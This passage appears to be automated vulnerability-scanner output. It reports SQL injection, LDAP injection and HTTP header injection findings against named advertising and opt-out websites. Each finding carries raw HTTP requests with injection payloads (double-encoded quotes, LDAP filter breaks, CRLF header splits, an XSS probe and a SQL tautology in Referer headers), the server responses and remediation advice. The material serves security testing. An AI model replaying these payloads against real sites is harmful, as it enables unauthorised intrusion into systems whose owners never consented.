window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=0.7764398'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.6935803'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.4733174'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.8685267'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.6828989'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.op
...[SNIP]...

1.40. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://y.timesunion.com
Path:   /b/ss/hearstalbanytu/1/H.21/s97295546184759

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/hearstalbanytu/1/H.21/s97295546184759?AQB=1&ndh=1&t=17/8/2011%2016%3A24%3A32%206%20300&vmt=4C9145CE&vmf=hearst.112.2o7.net&ns=hearst&pageName=HomePage&g=http%3A//www.timesunion.com/&r=http%3A//hearst.com/newspapers/albany-times-union.php&cc=USD&ch=home&server=timesunion.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A00PM&v17=5%3A00PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c22=Home&v22=Home&c23=4654&v23=4654&c24=home%20page&v24=home%20page&c28=http%3A//www.timesunion.com/&v29=http%3A//www.timesunion.com/&c42=http%3A//www.timesunion.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: y.timesunion.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294672447-New%7C1318886672447%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:36:58 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/hearstalbanytu/1/H.21/s97295546184759 was no
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/hearstalbanytu/1/H.21/s97295546184759?AQB=1&ndh=1&t=17/8/2011%2016%3A24%3A32%206%20300&vmt=4C9145CE&vmf=hearst.112.2o7.net&ns=hearst&pageName=HomePage&g=http%3A//www.timesunion.com/&r=http%3A//hearst.com/newspapers/albany-times-union.php&cc=USD&ch=home&server=timesunion.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A00PM&v17=5%3A00PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c22=Home&v22=Home&c23=4654&v23=4654&c24=home%20page&v24=home%20page&c28=http%3A//www.timesunion.com/&v29=http%3A//www.timesunion.com/&c42=http%3A//www.timesunion.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: y.timesunion.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294672447-New%7C1318886672447%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:36:58 GMT
Server: Omniture DC/2.0.0
xserver: www498
Content-Length: 0
Content-Type: text/html


2. LDAP injection  previous  next
There are 3 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://ce.lijit.com/merge [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*?pid=2&3pid=439524AE9E11374EB2C0C71740C604 HTTP/1.1
Host: ce.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: ljtrtb=eJyrVjJUslKyNDA2NjExMjYysDQ0M7AwNzM2UaoFAE9xBcY%3D; ljt_reader=1860442d61f8e1f2d8924f58549ca25b; _OACAP[4578]=1; _OABLOCK[4578]=1314593701; _OACCAP[593]=1; _OACBLOCK[593]=1314593701

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:09:13 GMT
Server: PWS/1.7.3.3
X-Px: ms h0-s1023.p10-sjc ( h0-s1004.p10-sjc), ms h0-s1004.p10-sjc ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 17 Sep 2011 17:09:43 GMT
Age: 0
Content-Length: 284
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /*)(sn=* was not found on this server.</p>
<hr>
<address>Apache/2.2.14 (Ubuntu) Server at vap.lijit.com Port 80</address>
</body></html>

Request 2

GET /*)!(sn=*?pid=2&3pid=439524AE9E11374EB2C0C71740C604 HTTP/1.1
Host: ce.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: ljtrtb=eJyrVjJUslKyNDA2NjExMjYysDQ0M7AwNzM2UaoFAE9xBcY%3D; ljt_reader=1860442d61f8e1f2d8924f58549ca25b; _OACAP[4578]=1; _OABLOCK[4578]=1314593701; _OACCAP[593]=1; _OACBLOCK[593]=1314593701

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:09:14 GMT
Server: PWS/1.7.3.3
X-Px: ms h0-s1023.p10-sjc ( h0-s1009.p10-sjc), ms h0-s1009.p10-sjc ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 17 Sep 2011 17:09:44 GMT
Age: 0
Content-Length: 206
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /*)!(sn=* was not found on this server.</p>
</body></html>

2.2. http://pixel.quantserve.com/optout_set [nocache parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /optout_set

Issue detail

The nocache parameter appears to be vulnerable to LDAP injection attacks.

The payloads c399e1dd97544dad)(sn=* and c399e1dd97544dad)!(sn=* were each submitted in the nocache parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /optout_set?s=nai&nocache=c399e1dd97544dad)(sn=* HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EKUBIQHdB4HyBprRW9iB4QochAEA

Response 1

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c399e1dd97544dad)(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 17:19:38 GMT
Server: QS

Request 2

GET /optout_set?s=nai&nocache=c399e1dd97544dad)!(sn=* HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EKUBIQHdB4HyBprRW9iB4QochAEA

Response 2

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c399e1dd97544dad)!(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 17:19:38 GMT
Server: QS


2.3. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The optThis parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the optThis parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=*)(sn=*&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&optThis=20&optThis=21&optThis=22&optThis=23&optThis=24&optThis=25&optThis=26&optThis=27&o
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:18:56 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.8184626 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.735603 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.5153401 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.9105494 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.7249216 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a
...[SNIP]...

Request 2

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=*)!(sn=*&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&optThis=20&optThis=21&optThis=22&optThis=23&optThis=24&optThis=25&optThis=26&optThis=27&o
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:18:56 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.6879694 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.6051098 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.384847 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.7800562 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.5944285 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a
...[SNIP]...

3. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d927907/35/43624044/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 9b8a5%0d%0a91d788bd1b was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d927907/35/43624044/decide.php?ord=1316296366 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=homepage&tile=1
Cookie: ES=9b8a5%0d%0a91d788bd1b; LP=1316270408; ST=913131_; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:30:03 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 17:30:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1ce587bf7f31d0813bf9c7fac_43624044-35-42_927907-1-1; expires=Wed, 07-Nov-2012 09:30:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=9b8a5
91d788bd1b
_927907-9E[|M-0; expires=Wed, 07-Nov-2012 09:30:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

3.2. http://login.dotomi.com/ucm/UCMController [redir_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The value of the redir_url request parameter is copied into the Location response header. The payload 2eb83%0d%0aabef94bf3d9 was submitted in the redir_url parameter. This caused a response containing an injected HTTP header.

Request

GET /ucm/UCMController?dtm_com=31&dtm_cid=2000&dtm_cmagic=7d619c&dtm_format=7&redir_url=2eb83%0d%0aabef94bf3d9 HTTP/1.1
Host: login.dotomi.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: DotomiUser=230600846273249123$0$2065492370; DotomiNet=2$DjQqblZ1R3FBBWdeBwJ9XghHIzxZewFTXBUgOFBKYHtrfgoKBQpCXAECVkBLQlUCJjFWfmp3CzQBfEMHZV4LB3JVCVV7cgViUgRNUGBDBwEgEGR8AAEICEBeBAJWR0hCQ1psa08oOycGGRA5AmtmXgQAdl0%3D

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:24:55 GMT
X-Name: dmc-s02
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 17:24:55 GMT; Path=/
Location: http://login.dotomi.com/ucm/2eb83
abef94bf3d9


Content-Type: text/html
Content-Length: 0


3.3. http://optout.crwdcntrl.net/optout [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the ct request parameter is copied into the Location response header. The payload 8d123%0d%0ac8452c8724b was submitted in the ct parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=8d123%0d%0ac8452c8724b HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: cc=optout

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:45 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:52 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=8d123
c8452c8724b
&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3.4. http://optout.crwdcntrl.net/optout [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the d request parameter is copied into the Location response header. The payload 71d66%0d%0a93e8c521907 was submitted in the d parameter. This caused a response containing an injected HTTP header.

